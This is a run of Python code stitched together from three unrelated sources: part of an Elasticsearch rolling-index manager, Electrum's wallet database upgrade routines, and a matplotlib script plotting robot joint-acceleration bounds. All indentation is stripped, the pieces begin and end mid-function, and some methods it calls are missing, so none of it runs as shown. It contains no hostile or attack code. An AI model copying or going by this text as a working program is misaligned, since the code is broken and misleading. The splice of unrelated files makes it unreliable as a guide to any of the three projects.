# app.config["ESDAO_ROLLING_{x}_{y}".format(x=pos.upper(), y=cls.__type__.upper())] = val
pass
@classmethod
def _get_file(cls, pos):
dir = cls._roll_dir()
f = os.path.join(dir, pos)
if os.path.exists(f) and os.path.isfile(f):
with open(f) as o:
return o.read()
return None
@classmethod
def _set_file(cls, pos, val):
if val is None:
cls._drop_file(pos)
return
dir = cls._roll_dir()
f = os.path.join(dir, pos)
with open(f, "wb") as o:
o.write(val)
@classmethod
def _drop_file(cls, pos):
dir = cls._roll_dir()
f = os.path.join(dir, pos)
if os.path.exists(f) and os.path.isfile(f):
os.remove(f)
@classmethod
def _init_type(cls, tname):
# there are two ways this might be initialised - by mapping or by example
# 1. by mapping
if cls.__init_by_mapping__:
mps = cls.mappings()
put_mappings({tname : {tname : mps[cls.__type__][cls.__type__]}})
# 2. by example
elif cls.__init_by_example__:
ex = cls.example()
put_example(tname, ex)
@classmethod
def _straighten_type(cls, pos, conn=None):
if conn is None:
conn = cls.__conn__
# get what we think the current index is for this position
i = cls._get_file(pos)
# if there's no index at that position, just check the cfg is reset correctly
if i is None:
cls._set_cfg(pos, None)
return
esv = app.config.get("ELASTIC_SEARCH_VERSION")
# if there is an index named, we need to check it exists
if esprit.raw.type_exists(conn, i, es_version=esv):
# if the type does exist, then we just need to check the config is reset correctly
cls._set_cfg(pos, i)
else:
# there is no type corresponding to the file, so reset the config and the file
cls._drop_file(pos)
cls._set_cfg(pos, None)
@classmethod
def rolling_status(cls):
pc = cls._get_cfg("prev")
pf = cls._get_file("prev")
cc = cls._get_cfg("curr")
cf = cls._get_file("curr")
nc = cls._get_cfg("next")
nf = cls._get_file("next")
s = {
"prev" : {"cfg" : pc, "file" : pf},
"curr" : {"cfg" : cc, "file" : cf},
"next" : {"cfg" : nc, "file" : nf}
}
return s
@classmethod
def rolling_refresh(cls):
cls._set_cfg("prev", cls._get_file("prev"))
cls._set_cfg("curr", cls._get_file("curr"))
cls._set_cfg("next", cls._get_file("next"))
@classmethod
def drop_next(cls, conn=None):
with cls._lock:
if conn is None:
conn = cls.__conn__
# get the canonical name for the index
n = cls._get_file("next")
if n is None:
return
# drop the file, the config and the index type in that order
cls._drop_file("next")
cls._set_cfg("next", None)
esprit.raw.delete(conn, n)
@classmethod
def self_init(cls, *args, **kwargs):
# determine if we've been given a connection or to use the default
conn = kwargs.get("conn")
if conn is None:
conn = cls.__conn__
# first determine if we've been passed any arguments for initialisation
tname = kwargs.get("type_name")
write_to = kwargs.get("write_to", "curr")
rollover = tname is not None
esv = app.config.get("ELASTIC_SEARCH_VERSION")
# synchronise access to the pointer files while we check and initialise the index
with cls._lock:
# now determine the route we're going to go down
if rollover:
# check whether the type to write already exists
if not esprit.raw.type_exists(conn, tname, es_version=esv):
cls._init_type(tname)
# now we know the index exists, we can write the file and the
# config
cls._set_file(write_to, tname)
cls._set_cfg(write_to, tname)
else:
# this is the raw application init route, and it needs to make sure that all the
# indices, files and config line up
# first ensure that the current index is set
curr = cls._get_file("curr")
if curr is None:
# if there is no current index, mint a type name for it, then initialise it
curr = cls._mint_next_type()
cls._init_type(curr)
else:
# check that the referenced index exists (it should, since _straighten_type above deals with that)
if not esprit.raw.type_exists(conn, curr, es_version=esv):
# if it does not, create the one referenced in the file
cls._init_type(curr)
# synchronise the file and config
cls._set_file("curr", curr)
cls._set_cfg("curr", curr)
# finish by ensuring that the other file pointers and the index are in sync
cls._straighten_type("prev")
cls._straighten_type("next")
###############################################
"""
dir = cls._roll_dir()
f = os.path.join(dir, write_to)
# since file reading/writing is going on, we need to synchronise access to this bit
with cls._lock:
# we only want to write on initialise if we have not already initialised this
# index type. So, if the file exists (e.g. "curr"), then no need to init
if write:
if os.path.exists(f):
return
# if we get to here either the write_to needs to be initialised, or we haven't
# been asked to "write" the index type we're initialising
# there are two ways this might be initialised - by mapping or by example
# 1. by mapping
if cls.__init_by_mapping__:
mps = cls.mappings()
put_mappings({tname : {tname : mps[cls.__type__][cls.__type__]}})
# 2. by example
elif cls.__init_by_example__:
ex = cls.example()
put_example(tname, ex)
# finally, write the type name to the file
if write:
if not os.path.exists(dir):
os.mkdir(dir)
with open(f, "wb") as o:
o.write(tname)
"""
@classmethod
def publish(cls, conn=None):
# synchronise access
with cls._lock:
if conn is None:
conn = cls.__conn__
prev = cls._get_file("prev")
curr = cls._get_file("curr")
next = cls._get_file("next")
if next is None:
return
# write current to previous
cls._set_file("prev", curr)
# write next to current
cls._set_file("curr", next)
# get rid of the next file
cls._drop_file("next")
# refresh the configuration
cls.rolling_refresh()
# drop the previous index, if it existed
if prev is not None:
esprit.raw.delete(conn, prev)
@classmethod
def rollback(cls, conn=None):
# synchronise access
with cls._lock:
if conn is None:
conn = cls.__conn__
prev = cls._get_file("prev")
curr = cls._get_file("curr")
next = cls._get_file("next")
# only continue if prev exists
if prev is None:
return
# write current to next
cls._set_file("next", curr)
# write previous to current
cls._set_file("curr", prev)
# get rid of the previous file
cls._drop_file("prev")
# refresh the configuration
cls.rolling_refresh()
# delete the old next index type
if next is not None:
esprit.raw.delete(conn, next)
@classmethod
def dynamic_read_types(cls):
for pref in cls.__read_preference__:
# first look to see if it is set in the config
t = cls._get_cfg(pref)
if t is not None:
return t
# if not next check to see if there's a file
t = cls._get_file(pref)
if t is not None:
cls._set_cfg(pref, t)
return t
# if we don't get anything, return the base type
return cls.__type__
@classmethod
def dynamic_write_type(cls):
# look to see if the next index is already set, in which case we
# can return
next = cls._get_cfg("next")
if next is not None:
return next
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import ast
import json
import copy
import threading
import time
from collections import defaultdict
from typing import Dict, Optional
from . import util, bitcoin
from .util import profiler, WalletFileException, multisig_type, TxMinedInfo
from .keystore import bip44_derivation
from .transaction import Transaction
from .logging import Logger
# seed_version is now used for the version of the wallet file
OLD_SEED_VERSION = 4 # electrum versions < 2.0
NEW_SEED_VERSION = 11 # electrum versions >= 2.0
FINAL_SEED_VERSION = 18 # electrum >= 2.7 will set this to prevent
# old versions from overwriting new format
class JsonDBJsonEncoder(util.MyEncoder):
def default(self, obj):
if isinstance(obj, Transaction):
return str(obj)
return super().default(obj)
class JsonDB(Logger):
def __init__(self, raw, *, manual_upgrades):
Logger.__init__(self)
self.lock = threading.RLock()
self.data = {}
self._modified = False
self.manual_upgrades = manual_upgrades
self.upgrade_done = False
self._called_after_upgrade_tasks = False
if raw: # loading existing db
self.load_data(raw)
else: # creating new db
self.put('seed_version', FINAL_SEED_VERSION)
self._after_upgrade_tasks()
self._addr_to_addr_index = {} # address -> (is_change, index)
self._ps_ks_addr_to_addr_index = {} # address -> (is_change, index)
def set_modified(self, b):
with self.lock:
self._modified = b
def modified(self):
return self._modified
def modifier(func):
def wrapper(self, *args, **kwargs):
with self.lock:
self._modified = True
return func(self, *args, **kwargs)
return wrapper
def locked(func):
def wrapper(self, *args, **kwargs):
with self.lock:
return func(self, *args, **kwargs)
return wrapper
@locked
def get(self, key, default=None):
v = self.data.get(key)
if v is None:
v = default
else:
v = copy.deepcopy(v)
return v
@modifier
def put(self, key, value):
try:
json.dumps(key, cls=JsonDBJsonEncoder)
json.dumps(value, cls=JsonDBJsonEncoder)
except:
self.logger.info(f"json error: cannot save {repr(key)} ({repr(value)})")
return False
if value is not None:
if self.data.get(key) != value:
self.data[key] = copy.deepcopy(value)
return True
elif key in self.data:
self.data.pop(key)
return True
return False
def commit(self):
pass
@locked
def dump(self):
return json.dumps(self.data, indent=4, sort_keys=True, cls=JsonDBJsonEncoder)
def load_data(self, s):
try:
self.data = json.loads(s)
except:
try:
d = ast.literal_eval(s)
labels = d.get('labels', {})
except Exception as e:
raise IOError("Cannot read wallet file")
self.data = {}
for key, value in d.items():
try:
json.dumps(key)
json.dumps(value)
except:
self.logger.info(f'Failed to convert label to json format: {key}')
continue
self.data[key] = value
if not isinstance(self.data, dict):
raise WalletFileException("Malformed wallet file (not dict)")
if not self.manual_upgrades and self.requires_split():
raise WalletFileException("This wallet has multiple accounts and must be split")
if not self.requires_upgrade():
self._after_upgrade_tasks()
elif not self.manual_upgrades:
self.upgrade()
def requires_split(self):
d = self.get('accounts', {})
return len(d) > 1
def split_accounts(self):
result = []
# backward compatibility with old wallets
d = self.get('accounts', {})
if len(d) < 2:
return
wallet_type = self.get('wallet_type')
if wallet_type == 'old':
assert len(d) == 2
data1 = copy.deepcopy(self.data)
data1['accounts'] = {'0': d['0']}
data1['suffix'] = 'deterministic'
data2 = copy.deepcopy(self.data)
data2['accounts'] = {'/x': d['/x']}
data2['seed'] = None
data2['seed_version'] = None
data2['master_public_key'] = None
data2['wallet_type'] = 'imported'
data2['suffix'] = 'imported'
result = [data1, data2]
elif wallet_type in ['bip44', 'trezor', 'keepkey', 'ledger', 'btchip',
'digitalbitbox', 'safe_t', 'hideez']:
mpk = self.get('master_public_keys')
for k in d.keys():
i = int(k)
x = d[k]
if x.get("pending"):
continue
xpub = mpk["x/%d'"%i]
new_data = copy.deepcopy(self.data)
# save account, derivation and xpub at index 0
new_data['accounts'] = {'0': x}
new_data['master_public_keys'] = {"x/0'": xpub}
new_data['derivation'] = bip44_derivation(k)
new_data['suffix'] = k
result.append(new_data)
else:
raise WalletFileException("This wallet has multiple accounts and must be split")
return result
def requires_upgrade(self):
return self.get_seed_version() < FINAL_SEED_VERSION
@profiler
def upgrade(self):
self.logger.info('upgrading wallet format')
if self._called_after_upgrade_tasks:
# we need strict ordering between upgrade() and after_upgrade_tasks()
raise Exception("'after_upgrade_tasks' must NOT be called before 'upgrade'")
self._convert_imported()
self._convert_wallet_type()
self._convert_account()
self._convert_version_13_b()
self._convert_version_14()
self._convert_version_15()
self._convert_version_16()
self._convert_version_17()
self._convert_version_18()
self.put('seed_version', FINAL_SEED_VERSION) # just to be sure
self.upgrade_done = True
self._after_upgrade_tasks()
def _after_upgrade_tasks(self):
self._called_after_upgrade_tasks = True
self._load_transactions()
def _convert_wallet_type(self):
if not self._is_upgrade_method_needed(0, 13):
return
wallet_type = self.get('wallet_type')
if wallet_type == 'btchip': wallet_type = 'ledger'
if self.get('keystore') or self.get('x1/') or wallet_type=='imported':
return False
assert not self.requires_split()
seed_version = self.get_seed_version()
seed = self.get('seed')
xpubs = self.get('master_public_keys')
xprvs = self.get('master_private_keys', {})
mpk = self.get('master_public_key')
keypairs = self.get('keypairs')
key_type = self.get('key_type')
if seed_version == OLD_SEED_VERSION or wallet_type == 'old':
d = {
'type': 'old',
'seed': seed,
'mpk': mpk,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif key_type == 'imported':
d = {
'type': 'imported',
'keypairs': keypairs,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif wallet_type in ['xpub', 'standard']:
xpub = xpubs["x/"]
xprv = xprvs.get("x/")
d = {
'type': 'bip32',
'xpub': xpub,
'xprv': xprv,
'seed': seed,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif wallet_type in ['bip44']:
xpub = xpubs["x/0'"]
xprv = xprvs.get("x/0'")
d = {
'type': 'bip32',
'xpub': xpub,
'xprv': xprv,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif wallet_type in ['trezor', 'keepkey', 'ledger', 'digitalbitbox',
'safe_t', 'hideez']:
xpub = xpubs["x/0'"]
derivation = self.get('derivation', bip44_derivation(0))
d = {
'type': 'hardware',
'hw_type': wallet_type,
'xpub': xpub,
'derivation': derivation,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif multisig_type(wallet_type):
for key in xpubs.keys():
d = {
'type': 'bip32',
'xpub': xpubs[key],
'xprv': xprvs.get(key),
}
if key == 'x1/' and seed:
d['seed'] = seed
self.put(key, d)
else:
raise WalletFileException('Unable to tell wallet type. Is this even a wallet file?')
# remove junk
self.put('master_public_key', None)
self.put('master_public_keys', None)
self.put('master_private_keys', None)
self.put('derivation', None)
self.put('seed', None)
self.put('keypairs', None)
self.put('key_type', None)
def _convert_version_13_b(self):
# version 13 is ambiguous, and has an earlier and a later structure
if not self._is_upgrade_method_needed(0, 13):
return
if self.get('wallet_type') == 'standard':
if self.get('keystore').get('type') == 'imported':
pubkeys = self.get('keystore').get('keypairs').keys()
d = {'change': []}
receiving_addresses = []
for pubkey in pubkeys:
addr = bitcoin.pubkey_to_address('p2pkh', pubkey)
receiving_addresses.append(addr)
d['receiving'] = receiving_addresses
self.put('addresses', d)
self.put('pubkeys', None)
self.put('seed_version', 13)
def _convert_version_14(self):
# convert imported wallets for 3.0
if not self._is_upgrade_method_needed(13, 13):
return
if self.get('wallet_type') =='imported':
addresses = self.get('addresses')
if type(addresses) is list:
addresses = dict([(x, None) for x in addresses])
self.put('addresses', addresses)
elif self.get('wallet_type') == 'standard':
if self.get('keystore').get('type')=='imported':
addresses = set(self.get('addresses').get('receiving'))
pubkeys = self.get('keystore').get('keypairs').keys()
assert len(addresses) == len(pubkeys)
d = {}
for pubkey in pubkeys:
addr = bitcoin.pubkey_to_address('p2pkh', pubkey)
assert addr in addresses
d[addr] = {
'pubkey': pubkey,
'redeem_script': None,
'type': 'p2pkh'
}
self.put('addresses', d)
self.put('pubkeys', None)
self.put('wallet_type', 'imported')
self.put('seed_version', 14)
def _convert_version_15(self):
if not self._is_upgrade_method_needed(14, 14):
return
self.put('seed_version', 15)
def _convert_version_16(self):
# fixes issue #3193 for Imported_Wallets with addresses
# also, previous versions allowed importing any garbage as an address
# which we now try to remove, see pr #3191
if not self._is_upgrade_method_needed(15, 15):
return
def remove_address(addr):
def remove_from_dict(dict_name):
d = self.get(dict_name, None)
if d is not None:
d.pop(addr, None)
self.put(dict_name, d)
def remove_from_list(list_name):
lst = self.get(list_name, None)
if lst is not None:
s = set(lst)
s -= {addr}
self.put(list_name, list(s))
# note: we don't remove 'addr' from self.get('addresses')
remove_from_dict('addr_history')
remove_from_dict('labels')
remove_from_dict('payment_requests')
remove_from_list('frozen_addresses')
if self.get('wallet_type') == 'imported':
addresses = self.get('addresses')
assert isinstance(addresses, dict)
addresses_new = dict()
for address, details in addresses.items():
if not bitcoin.is_address(address):
remove_address(address)
continue
if details is None:
addresses_new[address] = {}
else:
addresses_new[address] = details
self.put('addresses', addresses_new)
self.put('seed_version', 16)
def _convert_version_17(self):
# delete pruned_txo; construct spent_outpoints
if not self._is_upgrade_method_needed(16, 16):
return
self.put('pruned_txo', None)
transactions = self.get('transactions', {}) # txid -> raw_tx
spent_outpoints = defaultdict(dict)
for txid, raw_tx in transactions.items():
tx = Transaction(raw_tx)
for txin in tx.inputs():
if txin['type'] == 'coinbase':
continue
prevout_hash = txin['prevout_hash']
prevout_n = txin['prevout_n']
spent_outpoints[prevout_hash][str(prevout_n)] = txid
self.put('spent_outpoints', spent_outpoints)
self.put('seed_version', 17)
def _convert_version_18(self):
# delete verified_tx3 as its structure changed
if not self._is_upgrade_method_needed(17, 17):
return
self.put('verified_tx3', None)
self.put('seed_version', 18)
# Copyright 2018-2019 CNRS-UM LIRMM
#
# \author <NAME>
#
#
#
# pyQpController is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the License,
# or (at your option) any later version.
#
# pyQpController is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser
# General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with pyQpController. If not, see
# <http://www.gnu.org/licenses/>.
import sys
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from matplotlib.ticker import FormatStrFormatter
from matplotlib.font_manager import FontProperties
mpl.rcParams['ps.useafm'] = True
mpl.rcParams['pdf.use14corefonts'] = True
mpl.rcParams['text.usetex'] = True
# from matplotlib import colors as mcolors
# colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)
if __name__ =="__main__":
fileName = sys.argv[1]
loaded = np.load(fileName)
#loaded = np.load("../log/data/jointVelocityJump-data_Jan_31_2019_16-09-14.npz")
#loaded = np.load("../log/data/data_Jan_31_2019_18-50-43.npz")
time = loaded['time']
impact_time_1 = [0.24, 0.245] # Generic QP impact case
# impact_time_1 = [0.815, 0.825]
# impact_time_1 = [0.80, 0.815]
#impact_time_1 = [0.795, 0.805]
impact_time_2 = [0.485, 0.495]
impact_time_3 = [0.72, 0.73]
impact_time_4 = [0.99, 1.0]
font = {'family' : 'normal',
'weight' : 'bold',
'size' : 15}
fontP = FontProperties()
fontP.set_size('small')
dq = loaded['dq']
tau = loaded['tau']
ee_v = loaded['ee_v']
ee_f = loaded['ee_f']
#f_QP = loaded['f_QP']
length = len(time)
f_desired = np.ones((length ,1))*57
predict_tauUpper = loaded['predict_tauUpper']
predict_tauLower = loaded['predict_tauLower']
predict_impulseTau = loaded['predict_impulseTau']
impulseTau = loaded['impulseTau']
predict_delta_dq_upper_0 = loaded['predict_jointVelocityJump_upper'][:,0]
predict_delta_dq_upper_1 = loaded['predict_jointVelocityJump_upper'][:,1]
predict_delta_dq_upper_2 = loaded['predict_jointVelocityJump_upper'][:,2]
predict_delta_dq_upper_3 = loaded['predict_jointVelocityJump_upper'][:,3]
predict_delta_dq_upper_4 = loaded['predict_jointVelocityJump_upper'][:,4]
predict_delta_dq_upper_5 = loaded['predict_jointVelocityJump_upper'][:,5]
predict_delta_dq_lower_0 = loaded['predict_jointVelocityJump_lower'][:,0]
predict_delta_dq_lower_1 = loaded['predict_jointVelocityJump_lower'][:,1]
predict_delta_dq_lower_2 = loaded['predict_jointVelocityJump_lower'][:,2]
predict_delta_dq_lower_3 = loaded['predict_jointVelocityJump_lower'][:,3]
predict_delta_dq_lower_4 = loaded['predict_jointVelocityJump_lower'][:,4]
predict_delta_dq_lower_5 = loaded['predict_jointVelocityJump_lower'][:,5]
ddq_upper_bound_position_0 = loaded['ddqUpperBoundPosition'][:,0]
ddq_upper_bound_position_1 = loaded['ddqUpperBoundPosition'][:,1]
ddq_upper_bound_position_2 = loaded['ddqUpperBoundPosition'][:,2]
ddq_upper_bound_position_3 = loaded['ddqUpperBoundPosition'][:,3]
ddq_upper_bound_position_4 = loaded['ddqUpperBoundPosition'][:,4]
ddq_upper_bound_position_5 = loaded['ddqUpperBoundPosition'][:,5]
ddq_lower_bound_position_0 = loaded['ddqLowerBoundPosition'][:,0]
ddq_lower_bound_position_1 = loaded['ddqLowerBoundPosition'][:,1]
ddq_lower_bound_position_2 = loaded['ddqLowerBoundPosition'][:,2]
ddq_lower_bound_position_3 = loaded['ddqLowerBoundPosition'][:,3]
ddq_lower_bound_position_4 = loaded['ddqLowerBoundPosition'][:,4]
ddq_lower_bound_position_5 = loaded['ddqLowerBoundPosition'][:,5]
ddq_upper_bound_velocity_0 = loaded['ddqUpperBoundVelocity'][:,0]
ddq_upper_bound_velocity_1 = loaded['ddqUpperBoundVelocity'][:,1]
ddq_upper_bound_velocity_2 = loaded['ddqUpperBoundVelocity'][:,2]
ddq_upper_bound_velocity_3 = loaded['ddqUpperBoundVelocity'][:,3]
ddq_upper_bound_velocity_4 = loaded['ddqUpperBoundVelocity'][:,4]
ddq_upper_bound_velocity_5 = loaded['ddqUpperBoundVelocity'][:,5]
ddq_lower_bound_velocity_0 = loaded['ddqLowerBoundVelocity'][:,0]
ddq_lower_bound_velocity_1 = loaded['ddqLowerBoundVelocity'][:,1]
ddq_lower_bound_velocity_2 = loaded['ddqLowerBoundVelocity'][:,2]
ddq_lower_bound_velocity_3 = loaded['ddqLowerBoundVelocity'][:,3]
ddq_lower_bound_velocity_4 = loaded['ddqLowerBoundVelocity'][:,4]
ddq_lower_bound_velocity_5 = loaded['ddqLowerBoundVelocity'][:,5]
real_ddq_upper_bound_position_0 = loaded['real_ddqUpperBoundPosition'][:,0]
real_ddq_upper_bound_position_1 = loaded['real_ddqUpperBoundPosition'][:,1]
real_ddq_upper_bound_position_2 = loaded['real_ddqUpperBoundPosition'][:,2]
real_ddq_upper_bound_position_3 = loaded['real_ddqUpperBoundPosition'][:,3]
real_ddq_upper_bound_position_4 = loaded['real_ddqUpperBoundPosition'][:,4]
real_ddq_upper_bound_position_5 = loaded['real_ddqUpperBoundPosition'][:,5]
real_ddq_lower_bound_position_0 = loaded['real_ddqLowerBoundPosition'][:,0]
real_ddq_lower_bound_position_1 = loaded['real_ddqLowerBoundPosition'][:,1]
real_ddq_lower_bound_position_2 = loaded['real_ddqLowerBoundPosition'][:,2]
real_ddq_lower_bound_position_3 = loaded['real_ddqLowerBoundPosition'][:,3]
real_ddq_lower_bound_position_4 = loaded['real_ddqLowerBoundPosition'][:,4]
real_ddq_lower_bound_position_5 = loaded['real_ddqLowerBoundPosition'][:,5]
real_ddq_upper_bound_velocity_0 = loaded['real_ddqUpperBoundVelocity'][:,0]
real_ddq_upper_bound_velocity_1 = loaded['real_ddqUpperBoundVelocity'][:,1]
real_ddq_upper_bound_velocity_2 = loaded['real_ddqUpperBoundVelocity'][:,2]
real_ddq_upper_bound_velocity_3 = loaded['real_ddqUpperBoundVelocity'][:,3]
real_ddq_upper_bound_velocity_4 = loaded['real_ddqUpperBoundVelocity'][:,4]
real_ddq_upper_bound_velocity_5 = loaded['real_ddqUpperBoundVelocity'][:,5]
real_ddq_lower_bound_velocity_0 = loaded['real_ddqLowerBoundVelocity'][:,0]
real_ddq_lower_bound_velocity_1 = loaded['real_ddqLowerBoundVelocity'][:,1]
real_ddq_lower_bound_velocity_2 = loaded['real_ddqLowerBoundVelocity'][:,2]
real_ddq_lower_bound_velocity_3 = loaded['real_ddqLowerBoundVelocity'][:,3]
real_ddq_lower_bound_velocity_4 = loaded['real_ddqLowerBoundVelocity'][:,4]
real_ddq_lower_bound_velocity_5 = loaded['real_ddqLowerBoundVelocity'][:,5]
real_ddq_upper_bound_tau_0 = loaded['real_ddqUpperBoundTau'][:,0]
real_ddq_upper_bound_tau_1 = loaded['real_ddqUpperBoundTau'][:,1]
real_ddq_upper_bound_tau_2 = loaded['real_ddqUpperBoundTau'][:,2]
real_ddq_upper_bound_tau_3 = loaded['real_ddqUpperBoundTau'][:,3]
real_ddq_upper_bound_tau_4 = loaded['real_ddqUpperBoundTau'][:,4]
real_ddq_upper_bound_tau_5 = loaded['real_ddqUpperBoundTau'][:,5]
real_ddq_lower_bound_tau_0 = loaded['real_ddqLowerBoundTau'][:,0]
real_ddq_lower_bound_tau_1 = loaded['real_ddqLowerBoundTau'][:,1]
real_ddq_lower_bound_tau_2 = loaded['real_ddqLowerBoundTau'][:,2]
real_ddq_lower_bound_tau_3 = loaded['real_ddqLowerBoundTau'][:,3]
real_ddq_lower_bound_tau_4 = loaded['real_ddqLowerBoundTau'][:,4]
real_ddq_lower_bound_tau_5 = loaded['real_ddqLowerBoundTau'][:,5]
predict_ddq_upper_bound_tau_0 = loaded['predict_ddqUpperBoundTau'][:,0]
predict_ddq_upper_bound_tau_1 = loaded['predict_ddqUpperBoundTau'][:,1]
predict_ddq_upper_bound_tau_2 = loaded['predict_ddqUpperBoundTau'][:,2]
predict_ddq_upper_bound_tau_3 = loaded['predict_ddqUpperBoundTau'][:,3]
predict_ddq_upper_bound_tau_4 = loaded['predict_ddqUpperBoundTau'][:,4]
predict_ddq_upper_bound_tau_5 = loaded['predict_ddqUpperBoundTau'][:,5]
ddq_0 = loaded['ddq'][:, 0]
ddq_1 = loaded['ddq'][:, 1]
ddq_2 = loaded['ddq'][:, 2]
ddq_3 = loaded['ddq'][:, 3]
ddq_4 = loaded['ddq'][:, 4]
ddq_5 = loaded['ddq'][:, 5]
predict_ddq_lower_bound_tau_0 = loaded['predict_ddqLowerBoundTau'][:,0]
predict_ddq_lower_bound_tau_1 = loaded['predict_ddqLowerBoundTau'][:,1]
predict_ddq_lower_bound_tau_2 = loaded['predict_ddqLowerBoundTau'][:,2]
predict_ddq_lower_bound_tau_3 = loaded['predict_ddqLowerBoundTau'][:,3]
predict_ddq_lower_bound_tau_4 = loaded['predict_ddqLowerBoundTau'][:,4]
predict_ddq_lower_bound_tau_5 = loaded['predict_ddqLowerBoundTau'][:,5]
y_bins = 4
x_bins = 14
fig4, (ax41, ax42, ax43, ax44, ax45, ax46) = plt.subplots(nrows=6, ncols=1, figsize=(12,6))
ax41 = plt.subplot(611)
ax41.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
plt.plot(time, ddq_upper_bound_velocity_0, 'r--', label='Upper bound under impacts')
plt.plot(time, ddq_lower_bound_velocity_0, 'g--', label='Lower bound under impacts')
plt.plot(time, ddq_0, 'b', label='$\\ddot{q}_0$')
plt.plot(time, real_ddq_upper_bound_velocity_0, 'r', label='Upper bound')
plt.plot(time, real_ddq_lower_bound_velocity_0, 'g', label='Lower bound')
ax41.locator_params(nbins=6, axis='y')
ax41.autoscale(enable=True, axis='x', tight=True)
plt.setp(ax41.get_xticklabels(), visible=False)
plt.grid(True)
plt.title("Converted joint velocity constraints [$radian/s^2$]")
plt.yticks(fontsize=10)
ax41.locator_params(nbins=y_bins, axis='y')
ax41.legend(loc='upper left', prop={'size':5}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1, handlelength=4 )
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
# ax41.autoscale(enable=True, axis='y')
ax41.set_ylim([-1500, 1500])
ax42 = plt.subplot(612)
plt.plot(time, ddq_upper_bound_velocity_1, 'r--')
plt.plot(time, ddq_lower_bound_velocity_1, 'g--')
plt.plot(time, ddq_1, 'b', label='$\\ddot{q}_1$')
plt.plot(time, real_ddq_upper_bound_velocity_1, 'r')
plt.plot(time, real_ddq_lower_bound_velocity_1, 'g')
ax42.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
ax42.autoscale(enable=True, axis='x', tight=True)
plt.setp(ax42.get_xticklabels(), visible=False)
plt.grid(True)
plt.yticks(fontsize=10)
ax42.locator_params(nbins=y_bins, axis='y')
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
ax42.autoscale(enable=True, axis='y')
# ax42.set_ylim([-1200, 1200])
ax42.legend(loc='upper left', prop={'size':5}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1 )
ax43 = plt.subplot(613)
plt.plot(time, ddq_upper_bound_velocity_2, 'r--')
plt.plot(time, ddq_lower_bound_velocity_2, 'g--')
plt.plot(time, ddq_2, 'b', label='$\\ddot{q}_2$')
plt.plot(time, real_ddq_upper_bound_velocity_2, 'r')
plt.plot(time, real_ddq_lower_bound_velocity_2, 'g')
ax43.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
ax43.autoscale(enable=True, axis='x', tight=True)
plt.setp(ax43.get_xticklabels(), visible=False)
plt.grid(True)
plt.yticks(fontsize=10)
ax43.locator_params(nbins=y_bins, axis='y')
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
ax43.autoscale(enable=True, axis='y')
# ax43.set_ylim([-1600, 1500])
ax43.legend(loc='upper left', prop={'size':5}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1 )
ax44 = plt.subplot(614)
plt.plot(time, ddq_upper_bound_velocity_3, 'r--')
plt.plot(time, ddq_lower_bound_velocity_3, 'g--')
plt.plot(time, ddq_3, 'b', label='$\\ddot{q}_3$')
plt.plot(time, real_ddq_upper_bound_velocity_3, 'r')
plt.plot(time, real_ddq_lower_bound_velocity_3, 'g')
ax44.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
ax44.autoscale(enable=True, axis='x', tight=True)
plt.setp(ax44.get_xticklabels(), visible=False)
plt.grid(True)
plt.yticks(fontsize=10)
ax44.locator_params(nbins=y_bins, axis='y')
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
ax44.autoscale(enable=True, axis='y')
